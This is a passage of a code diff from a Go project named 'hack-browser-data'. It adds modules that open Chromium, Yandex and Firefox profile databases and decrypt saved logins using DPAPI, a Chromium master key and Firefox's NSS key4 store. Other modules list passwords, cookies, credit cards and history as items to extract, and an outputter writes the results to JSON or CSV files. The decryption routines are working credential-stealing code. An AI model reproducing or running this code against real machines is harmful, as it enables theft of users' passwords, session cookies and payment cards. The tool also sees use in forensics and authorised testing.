id, visitDate int64
url, title string
visitCount int
)
if err = historyRows.Scan(&id, &url, &visitDate, &title, &visitCount); err != nil {
fmt.Println(err)
}
*f = append(*f, history{
Title: title,
Url: url,
VisitCount: visitCount,
LastVisitTime: utils.TimeStampFormat(visitDate / 1000000),
})
}
sort.Slice(*f, func(i, j int) bool {
return (*f)[i].VisitCount < (*f)[j].VisitCount
})
return nil
}
func (f *FirefoxHistory) Name() string {
return "history"
}
internal/browser/data/password.go
+198
View File
@@ -0,0 +1,198 @@
package data
import (
"bytes"
"database/sql"
"encoding/base64"
"fmt"
"io/ioutil"
"sort"
"time"
"hack-browser-data/internal/browser/consts"
decrypter2 "hack-browser-data/internal/decrypter"
"hack-browser-data/internal/utils"
_ "github.com/mattn/go-sqlite3"
"github.com/tidwall/gjson"
)
type ChromiumPassword []loginData
func (c *ChromiumPassword) Parse(masterKey []byte) error {
loginDB, err := sql.Open("sqlite3", consts.ChromiumPasswordFilename)
if err != nil {
return err
}
defer loginDB.Close()
rows, err := loginDB.Query(queryChromiumLogin)
if err != nil {
return err
}
defer rows.Close()
for rows.Next() {
var (
url, username string
pwd, password []byte
create int64
)
if err := rows.Scan(&url, &username, &pwd, &create); err != nil {
fmt.Println(err)
}
login := loginData{
UserName: username,
encryptPass: pwd,
LoginUrl: url,
}
if len(pwd) > 0 {
if masterKey == nil {
password, err = decrypter2.DPApi(pwd)
if err != nil {
fmt.Println(err)
}
} else {
password, err = decrypter2.ChromePass(masterKey, pwd)
if err != nil {
fmt.Println(err)
}
}
}
if create > time.Now().Unix() {
login.CreateDate = utils.TimeEpochFormat(create)
} else {
login.CreateDate = utils.TimeStampFormat(create)
}
login.Password = string(password)
*c = append(*c, login)
}
// sort with create date
sort.Slice(*c, func(i, j int) bool {
return (*c)[i].CreateDate.After((*c)[j].CreateDate)
})
return nil
}
func (c *ChromiumPassword) Name() string {
return "password"
}
type FirefoxPassword []loginData
func (f *FirefoxPassword) Parse(masterKey []byte) error {
globalSalt, metaBytes, nssA11, nssA102, err := getFirefoxDecryptKey(consts.FirefoxKey4Filename)
if err != nil {
return err
}
metaPBE, err := decrypter2.NewASN1PBE(metaBytes)
if err != nil {
return err
}
k, err := metaPBE.Decrypt(globalSalt, masterKey)
if err != nil {
return err
}
keyLin := []byte{248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1}
if bytes.Contains(k, []byte("password-check")) {
m := bytes.Compare(nssA102, keyLin)
if m == 0 {
nssPBE, err := decrypter2.NewASN1PBE(nssA11)
if err != nil {
return err
}
finallyKey, err := nssPBE.Decrypt(globalSalt, masterKey)
finallyKey = finallyKey[:24]
if err != nil {
return err
}
allLogin, err := getFirefoxLoginData(consts.FirefoxPasswordFilename)
if err != nil {
return err
}
for _, v := range allLogin {
userPBE, err := decrypter2.NewASN1PBE(v.encryptUser)
if err != nil {
return err
}
pwdPBE, err := decrypter2.NewASN1PBE(v.encryptPass)
if err != nil {
return err
}
user, err := userPBE.Decrypt(finallyKey, masterKey)
if err != nil {
return err
}
pwd, err := pwdPBE.Decrypt(finallyKey, masterKey)
if err != nil {
return err
}
*f = append(*f, loginData{
LoginUrl: v.LoginUrl,
UserName: string(decrypter2.PKCS5UnPadding(user)),
Password: string(decrypter2.PKCS5UnPadding(pwd)),
CreateDate: v.CreateDate,
})
}
}
}
sort.Slice(*f, func(i, j int) bool {
return (*f)[i].CreateDate.After((*f)[j].CreateDate)
})
return nil
}
func (f *FirefoxPassword) Name() string {
return "password"
}
func getFirefoxDecryptKey(key4file string) (item1, item2, a11, a102 []byte, err error) {
var (
keyDB *sql.DB
)
keyDB, err = sql.Open("sqlite3", key4file)
if err != nil {
return nil, nil, nil, nil, err
}
defer keyDB.Close()
if err = keyDB.QueryRow(queryMetaData).Scan(&item1, &item2); err != nil {
return nil, nil, nil, nil, err
}
if err = keyDB.QueryRow(queryNssPrivate).Scan(&a11, &a102); err != nil {
return nil, nil, nil, nil, err
}
return item1, item2, a11, a102, nil
}
func getFirefoxLoginData(loginJson string) (l []loginData, err error) {
s, err := ioutil.ReadFile(loginJson)
if err != nil {
return nil, err
}
h := gjson.GetBytes(s, "logins")
if h.Exists() {
for _, v := range h.Array() {
var (
m loginData
user []byte
pass []byte
)
m.LoginUrl = v.Get("formSubmitURL").String()
user, err = base64.StdEncoding.DecodeString(v.Get("encryptedUsername").String())
if err != nil {
return nil, err
}
pass, err = base64.StdEncoding.DecodeString(v.Get("encryptedPassword").String())
if err != nil {
return nil, err
}
m.encryptUser = user
m.encryptPass = pass
m.CreateDate = utils.TimeStampFormat(v.Get("timeCreated").Int() / 1000)
l = append(l, m)
}
}
return l, nil
}
internal/browser/item.go
+166
View File
@@ -0,0 +1,166 @@
package browser
import (
"hack-browser-data/internal/browser/consts"
data2 "hack-browser-data/internal/browser/data"
)
type item int
const (
chromiumKey item = iota
chromiumPassword
chromiumCookie
chromiumBookmark
chromiumHistory
chromiumDownload
chromiumCreditCard
chromiumLocalStorage
chromiumExtension
yandexPassword
yandexCreditCard
firefoxKey4
firefoxPassword
firefoxCookie
firefoxBookmark
firefoxHistory
firefoxDownload
firefoxCreditCard
firefoxLocalStorage
firefoxExtension
)
func (i item) DefaultName() string {
switch i {
case chromiumKey:
return consts.ChromiumKey
case chromiumPassword:
return consts.ChromiumPassword
case chromiumCookie:
return consts.ChromiumCookie
case chromiumBookmark:
return consts.ChromiumBookmark
case chromiumDownload:
return consts.ChromiumDownload
case chromiumLocalStorage:
return consts.ChromiumLocalStorage
case chromiumCreditCard:
return consts.ChromiumCredit
case chromiumExtension:
return consts.UnknownItem
case chromiumHistory:
return consts.ChromiumHistory
case yandexPassword:
return consts.YandexPassword
case yandexCreditCard:
return consts.YandexCredit
case firefoxKey4:
return consts.FirefoxKey4
case firefoxPassword:
return consts.FirefoxPassword
case firefoxCookie:
return consts.FirefoxCookie
case firefoxBookmark:
return consts.FirefoxData
case firefoxDownload:
return consts.FirefoxData
case firefoxLocalStorage:
return consts.UnsupportedItem
case firefoxCreditCard:
return consts.UnsupportedItem
case firefoxHistory:
return consts.FirefoxData
case firefoxExtension:
return consts.UnsupportedItem
default:
return consts.UnknownItem
}
}
func (i item) FileName() string {
switch i {
case chromiumKey:
return consts.ChromiumKeyFilename
case chromiumPassword:
return consts.ChromiumPasswordFilename
case chromiumCookie:
return consts.ChromiumCookieFilename
case chromiumBookmark:
return consts.ChromiumBookmarkFilename
case chromiumDownload:
return consts.ChromiumDownloadFilename
case chromiumLocalStorage:
return consts.ChromiumLocalStorageFilename
case chromiumCreditCard:
return consts.ChromiumCreditFilename
case chromiumHistory:
return consts.ChromiumHistoryFilename
case chromiumExtension:
return consts.UnsupportedItem
case yandexPassword:
return consts.ChromiumPasswordFilename
case yandexCreditCard:
return consts.ChromiumCreditFilename
case firefoxKey4:
return consts.FirefoxKey4Filename
case firefoxPassword:
return consts.FirefoxPasswordFilename
case firefoxCookie:
return consts.FirefoxCookieFilename
case firefoxBookmark:
return consts.FirefoxBookmarkFilename
case firefoxDownload:
return consts.FirefoxDownloadFilename
case firefoxLocalStorage:
return consts.UnsupportedItem
case firefoxCreditCard:
return consts.UnsupportedItem
case firefoxHistory:
return consts.FirefoxHistoryFilename
case firefoxExtension:
return consts.UnsupportedItem
default:
return consts.UnknownItem
}
}
func (i item) NewBrowsingData() data2.BrowsingData {
switch i {
case chromiumKey:
return nil
case chromiumPassword:
return &data2.ChromiumPassword{}
case chromiumCookie:
return &data2.ChromiumCookie{}
case chromiumBookmark:
return &data2.ChromiumBookmark{}
case chromiumDownload:
return &data2.ChromiumDownload{}
case chromiumLocalStorage:
return nil
case chromiumCreditCard:
return &data2.ChromiumCreditCard{}
case chromiumExtension:
return nil
case chromiumHistory:
return &data2.ChromiumHistory{}
case yandexPassword:
return &data2.ChromiumPassword{}
case yandexCreditCard:
return &data2.ChromiumCreditCard{}
case firefoxPassword:
return &data2.FirefoxPassword{}
case firefoxCookie:
return &data2.FirefoxCookie{}
case firefoxBookmark:
return &data2.FirefoxBookmark{}
case firefoxDownload:
return &data2.FirefoxDownload{}
case firefoxHistory:
return &data2.FirefoxHistory{}
default:
return nil
}
}
internal/browser/outputter/outputter.go
+79
View File
@@ -0,0 +1,79 @@
package outputter
import (
"encoding/csv"
"errors"
"io"
"os"
"path/filepath"
"github.com/gocarina/gocsv"
jsoniter "github.com/json-iterator/go"
"hack-browser-data/internal/browser/data"
)
type outPutter struct {
json bool
csv bool
}
func NewOutPutter(flag string) *outPutter {
o := &outPutter{}
if flag == "json" {
o.json = true
} else {
o.csv = true
}
return o
}
func (o *outPutter) MakeDir(dir string) error {
if _, err := os.Stat(dir); os.IsNotExist(err) {
return os.Mkdir(dir, 0777)
}
return nil
}
func (o *outPutter) Write(data data.BrowsingData, writer *os.File) error {
switch o.json {
case true:
encoder := jsoniter.NewEncoder(writer)
encoder.SetIndent(" ", " ")
encoder.SetEscapeHTML(false)
return encoder.Encode(data)
default:
gocsv.SetCSVWriter(func(w io.Writer) *gocsv.SafeCSVWriter {
writer := csv.NewWriter(w)
writer.Comma = ','
return gocsv.NewSafeCSVWriter(writer)
})
return gocsv.MarshalFile(data, writer)
}
}
func (o *outPutter) CreateFile(dirname, filename string) (*os.File, error) {
if filename == "" {
return nil, errors.New("empty filename")
}
dir := filepath.Dir(filename)
if dir != "" {
if _, err := os.Stat(dir); os.IsNotExist(err) {
err := os.MkdirAll(dir, 0777)
if err != nil {
return nil, err
}
}
}
var file *os.File
var err error
p := filepath.Join(dirname, filename)
file, err = os.OpenFile(p, os.O_TRUNC|os.O_CREATE|os.O_WRONLY|os.O_APPEND, 0666)
if err != nil {
return nil, err
}
return file, nil
}